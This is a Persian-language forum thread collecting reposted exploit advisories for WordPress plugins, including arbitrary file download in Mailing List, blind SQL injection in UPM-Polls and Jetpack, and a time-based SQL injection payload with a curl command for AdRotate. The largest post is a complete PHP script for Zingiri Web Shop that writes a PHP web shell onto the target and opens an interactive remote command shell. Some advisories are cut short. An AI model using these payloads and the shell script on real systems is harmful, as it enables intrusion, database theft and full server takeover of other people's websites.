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کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

#Exploit Title: Mailing List plugin for Wordpress Arbitrary file download
#Version:  < 1.4.2
#Date: 2011-12-19
#Author: 6Scan (http://6scan.com) security team
#Software Link: http://wordpress.org/extend/plugins/mailz/
#Official fix: This advisory is released after the vendor (http://www.zingiri.com)  was contacted and fixed the issue promptly.
#Description :  Unauthorized users can download arbitrary files from the server using this exploit.
#                                                             Vulnerable script includes config.php file, which connects to database with supplied credentials. Database entries are used to retrieve files from host.
#                                                             The bug is in config.php, but accessible from other file.
1) Setup mysql database
2) Create table with the next structure:
CREATE TABLE IF NOT EXISTS `phplist_attachment` (
  `filename` varchar(1024) NOT NULL,
  `mimetype` varchar(1024) NOT NULL,
  `remotefile` varchar(1024) NOT NULL,
  `description` varchar(1024) NOT NULL,
  `size` int(11) NOT NULL,
  `id` int(11) NOT NULL
3) Add this raw into database:
INSERT INTO `phplist_attachment` (`filename`, `mimetype`, `remotefile`, `description`, `size`, `id`) VALUES
('../../../../../somefile.txt', '', '', '', 0, 0);
4) Call the script with database parameters and file id to download:
The credentials are now saved in session, and there is no need to continue passing them:

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

# Exploit Title: BLIND SQL injection UPM-POLLS wordpress plugin 1.0.4
# Google Dork: n/a
# Date: 04-12-2011
# Author: Saif El-Sherei
# Software Link: http://downloads.wordpress.org/plugin/upm-polls.1.0.4.zip
# Version: 1.0.4
# Tested on: wordpress 3.2.1,Firefox 4, XAMPP
Best Plugin to create Polls for your site. Everything is smoother, faster,
and seamless like WordPress itself.
    Poll Manager,
        Ability to set general and post/page specific polls,
        Ability to leaf over the polls
        Ability to add certain poll in certain post content
        Ability to show polls either with and without current results of
the Variable PID is not properly sanitized in the get request before
insertion into the database query; allowing an attaacker or any user who
can view poll results (supposedly   all user) to use blind sql injection to
extract database data and possibly compromise the whole server. a POC is
provided with both true and false results.
"poll results for poll 2 is displayed"
"Blank page is displayed"
Time Line:
04-12-2011 Vulnerability discovered
04-12-2011 Vendor notified
11-12-2011 No response from vendor, public disclosure

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

# Exploit Title: WordPress AdRotate plugin <= 3.6.6 SQL Injection Vulnerability
# Date: 2011-11-8
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: http://downloads.wordpress.org/plugin/adrotate.3.6.6.zip
# Version: 3.6.6 (tested)
# Note: parameter $_GET["track"] has to be Base64 encoded
payload="1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#"
encoded=`echo -n "1' AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)#" | base64 -w 0`
curl http://www.site.com/wp-content/plugins/adrotate/adrotate-out.php?track=$encoded
Vulnerable code
if(isset($_GET['track']) OR $_GET['track'] != '') {
    $meta = base64_decode($_GET['track']);
    list($ad, $group, $block) = explode("-", $meta);

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

    Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit
    author...............: Egidio Romano aka EgiX
    mail.................: n0b0d13s[at]gmail[dot]com
    software link........: http://wordpress.org/extend/plugins/zingiri-web-shop/
    affected versions....: from 0.9.12 to 2.2.3
    | This proof of concept code was written for educational purpose only.    |
    | Use it at your own risk. Author will be not responsible for any damage. |
    [-] vulnerable code in /fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager/ajax_save_name.php
    37.            @ob_start();
    38.            include_once(CLASS_SESSION_ACTION);
    39.            $sessionAction = new SessionAction();       
    40.            $selectedDocuments = $sessionAction->get();
    41.            if(removeTrailingSlash($sessionAction->getFolder()) == getParentPath($_POST['id']) && sizeof($selectedDocuments))
    42.            {
    43.                if(($key = array_search(basename($_POST['id']), $selectedDocuments)) !== false)
    44.                {
    45.                    $selectedDocuments[$key] = $_POST['value'];
    46.                    $sessionAction->set($selectedDocuments);
    48.                }
    49.                echo basename($_POST['id']) . "\n";
    50.                displayArray($selectedDocuments);
    52.            }elseif(removeTrailingSlash($sessionAction->getFolder()) == removeTrailingSlash($_POST['id']))
    53.            {
    54.                $sessionAction->setFolder($_POST['id']);
    55.            }
    56.            writeInfo(ob_get_clean());
    An attacker could be able to manipulate the $selectedDocuments array that will be displayed at line 50,
    then at line 56 is called the 'writeInfo' function using the current buffer contents as argument.
    Like my recently discovered vulnerability (http://www.exploit-db.com/exploits/18075/), this function
    writes into a file called 'data.php' so an attacker could be able to execute arbitrary PHP code.
    [-] Note:
    The same vulnerability affects also the Joomla component (http://extensions.joomla.org/extensions/e-commerce/shopping-cart/13580)
    but isn't exploitable due to a misconfiguration in 'CONFIG_SYS_ROOT_PATH' constant definition.
    [-] Disclosure timeline:
    [23/10/2011] - Vulnerability discovered
    [25/10/2011] - Issue reported to http://forums.zingiri.com/
    [12/11/2011] - Version 2.2.4 released
    [13/11/2011] - Public disclosure
ini_set("default_socket_timeout", 5);
$fileman = "wp-content/plugins/zingiri-web-shop/fws/addons/tinymce/jscripts/tiny_mce/plugins/ajaxfilemanager";
function http_send($host, $packet)
    if (!($sock = fsockopen($host, 80)))
        die( "\n[-] No response from {$host}:80\n");
    fwrite($sock, $packet);
    return stream_get_contents($sock);
function get_root_dir()
    global $host, $path, $fileman;
    $packet  = "GET {$path}{$fileman}/ajaxfilemanager.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Connection: close\r\n\r\n";
    if (!preg_match('/currentFolderPath" value="([^"]*)"/', http_send($host, $packet), $m)) die("\n[-] Root folder path not found!\n");
    return $m[1];
function random_mkdir()
    global $host, $path, $fileman, $rootdir;
    $dirname = uniqid();
    $payload = "new_folder={$dirname}&currentFolderPath={$rootdir}";
    $packet  = "POST {$path}{$fileman}/ajax_create_folder.php HTTP/1.0\r\n";
    $packet .= "Host: {$host}\r\n";
    $packet .= "Content-Length: ".strlen($payload)."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Connection: close\r\n\r\n{$payload}";
    http_send($host, $packet);   
    return $dirname;
print "\n+----------------------------------------------------------------------------------+";
print "\n| Wordpress Zingiri Web Shop Plugin <= 2.2.3 Remote Code Execution Exploit by EgiX |";
print "\n+----------------------------------------------------------------------------------+\n";
if ($argc < 3)
    print "\nUsage......: php $argv[0] <host> <path>\n";
    print "\nExample....: php $argv[0] localhost /";
    print "\nExample....: php $argv[0] localhost /wordpress/\n";
$host = $argv[1];
$path = $argv[2];
$rootdir = get_root_dir();
$phpcode = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>";
$payload = "selectedDoc[]={$phpcode}&currentFolderPath={$rootdir}";
$packet  = "POST {$path}{$fileman}/ajax_file_cut.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
if (!preg_match("/Set-Cookie: ([^;]*);/", http_send($host, $packet), $sid)) die("\n[-] Session ID not found!\n");
$dirname = random_mkdir();
$newname = uniqid();
$payload = "value={$newname}&id={$rootdir}{$dirname}";
$packet  = "POST {$path}{$fileman}/ajax_save_name.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
http_send($host, $packet);
$packet  = "GET {$path}{$fileman}/inc/data.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
    print "\nzingiri-shell# ";
    if (($cmd = trim(fgets(STDIN))) == "exit") break;
    preg_match("/_code_(.*)/s", http_send($host, sprintf($packet, base64_encode($cmd))), $m) ?
    print $m[1] : die("\n[-] Exploit failed!\n");

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:14 AM
تشکرات از این پست
کاربر طلایی1
تاریخ عضویت : اسفند 1389 
تعداد پست ها : 158652
محل سکونت : ▂▃▄▅▆▇█Tabriz█▇▆▅▄▃▂

پاسخ به:•••کلکسیون باگ های وردپرس•••

# Exploit Title: WordPress jetpack plugin SQL Injection Vulnerability
# Date: 2011-19-11
# Author: longrifle0x
# software: Wordpress
# Download:http://wordpress.org/extend/plugins/jetpack/
# Tools: SQLMAP
Discovered a vulnerability in  jetpack, Wordpress Plugin,
vulnerability is SQL injection.
Exploit: id=-1; or 1=if
[GET][id=-1][SELECT(CASE WHEN ((SELECT super_priv FROMmysql.user WHERE use
r='None' LIMIT 0,1)='Y') THEN 1 ELSE 0 END)

ترکی زبان قربون صدقه رفتنه داریم که: گوزلرین گیله‌سین قاداسین آلیم که یعنی درد و بلای مردمک چشات به جونم …!.

یک شنبه 3 خرداد 1394  8:15 AM
تشکرات از این پست
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